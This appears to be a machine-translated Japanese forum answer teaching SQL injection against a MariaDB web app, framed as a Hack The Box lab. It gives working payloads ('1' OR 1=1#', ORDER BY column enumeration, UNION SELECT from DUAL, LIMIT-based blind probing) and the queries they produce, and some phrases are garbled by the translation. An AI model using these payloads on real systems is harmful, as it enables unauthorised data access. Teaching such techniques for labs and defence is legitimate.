MariaDb SQLインジェクション

編集：これはハック・ザ・ボックスで行われているので、不快な違法行為は行われていません。

では、少し楽しみましょう。

エラーメッセージを見ると

デバッグ情報：SQL構文にエラーがあります。 MariaDBサーバーのバージョンに対応するマニュアルで、1行目の「5」付近または'1'') LIMIT 10'などの正しい構文を使用するための正しい構文を確認してください

アプリケーションのクエリとコードが多かれ少なかれこの擬似賢明であると仮定すると、@oは実際にはMySQLユーザー変数です。

SELECT
 *
FROM
 DUMMY_TABLE
WHERE
 DUMMY_TABLE.o = '",@o,"'
LIMIT 10 

SQLフィドル space を使用して、SQLインジェクションテストをシミュレートし、他のテーブルへのアクセスを可能にします。

1' OR 1 = 1#または1' OR 1 = 1--を使用してインジェクションをテストできます。1を入力として使用すると、どちらも機能し、同じ結果が得られます。これは、MariaDB自動が他のデータベースの型をキャストしているためです。より厳密なバージョンを使用する必要がある場合があります1' OR '1' = '1#

どちらが生成するか

SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' OR 1 = 1#' LIMIT 10 

または

SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' OR 1 = 1--' LIMIT 10 

次に、アプリケーションにエラーが表示されるため、ORDER BY 1を使用して、選択されている列の数を確認し、エラーが発生するまで数を増やします。

エラー：ER_BAD_FIELD_ERROR：不明な列 '2'が 'order句'にあります

注入する

1' ORDER BY 1#または1' ORDER BY 1--

つまり、結果セットの最初の列で並べ替えます[〜＃〜]ではありません[〜＃〜]並べ替え1リテラル。

生成する

SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' ORDER BY 1#' LIMIT 10 

または

SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' ORDER BY 1--' LIMIT 10 

列がわかっている場合は、UNIONを使用して他のテーブルにアクセスできます。すべての列が必要ない場合は、NULLを使用します。

注入

1' UNION ALL SELECT NULL FROM DUAL#

DUALはMariaDB、MySQL、Oracleの「仮想」非存在テーブルであることに注意してください。この「テーブル」にクエリを実行できる場合、技術的に他のテーブルにもアクセスできることを意味します。

生成されたSQL

SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' UNION ALL SELECT NULL FROM DUAL#' LIMIT 10 

また、Webページが1つのレコードが常に表示される「詳細」ページとして設計されている場合は、インジェクションにLIMIT 1, 1を追加する必要があります。

Webアプリケーションにエラーが表示されない場合は、ブラインドSQLインジェクションを使用して盲目的にブルートフォースガウスを実行し、アプリケーションの動作を確認できます。
また、?o=0、?o=NULLのようなもの、または最大INT値（Signed）?o=2147483647または（unsigned）?o=4294967295などの非常に高い数値を試してみてください。使用された列番号をブルートフォースすることで、見つからないレコードがアプリケーションでどのように処理されるかがわかります。 INTデータ型にid 0またはその高い数値がある可能性は非常に低いためです。これは、最後の数値が指定された場合、アプリケーションが動作を停止するためです。それでもこれらの高い数値のレコードを取得する場合は、代わりにBIGINTデータ型の最大値を使用してください。

列1の同じ結果ID o=1
1' UNION ALL SELECT 1 FROM DUAL LIMIT 1, 1#

エラーが発生しますが、ほとんどの場合、エラーページまたはレコードが見つからなかったことを示すメッセージが表示される列2について。
または甘いHTTP 404（見つかりません）エラーステータス。
1' UNION ALL SELECT 1 FROM DUAL LIMIT 1, 1#

ORDER BYを使用せずにLIMITを使用する場合に発生する可能性がある1つの問題は、SQLテーブル/結果セットが順序なしであるとSQL標準で定義されているため、同じレコードを取得する可能性がありますORDER BYを使用しない

したがって、ブルートフォースでORDER BY 1を使い続けることが理想的です。

1' UNION ALL SELECT 1 FROM DUAL ORDER BY 1 DESC#

そして

1' UNION ALL SELECT 1 FROM DUAL ORDER BY 1 DESC LIMIT 1, 1#

ORDER BY 1のデータベースサポートは、MySQL、MariaDB、SQL Server（MSSQL）、PostgreSQLで動作するため、最初に考えていたよりも優れています。

また、ORDER BY 1は、SQL 99で削除されたSQL 92機能でした。
実際、SQLデータベースは、この点でSQL標準に従う場合、ORDER BY 1 annymoreを実行すべきではありません。

SQL 92 BNF

 <sort specification list> ::=
      <sort specification> [ { <comma> <sort specification> }... ]

 <sort specification> ::=
      <sort key> [ <collate clause > ] [ <ordering specification> ]


 <sort key> ::=
        <column name>
      | <unsigned integer> # <- here it is 

 <ordering specification> ::= ASC | DESC

vs SQL 1999 BNF

 <sort specification list> ::=
      <sort specification> [ { <comma> <sort specification> }... ]

 <sort specification> ::=
      <sort key> [ <collate clause > ] [ <ordering specification> ]


 <sort key> ::=
        <column name>
                        # <- missing

 <ordering specification> ::= ASC | DESC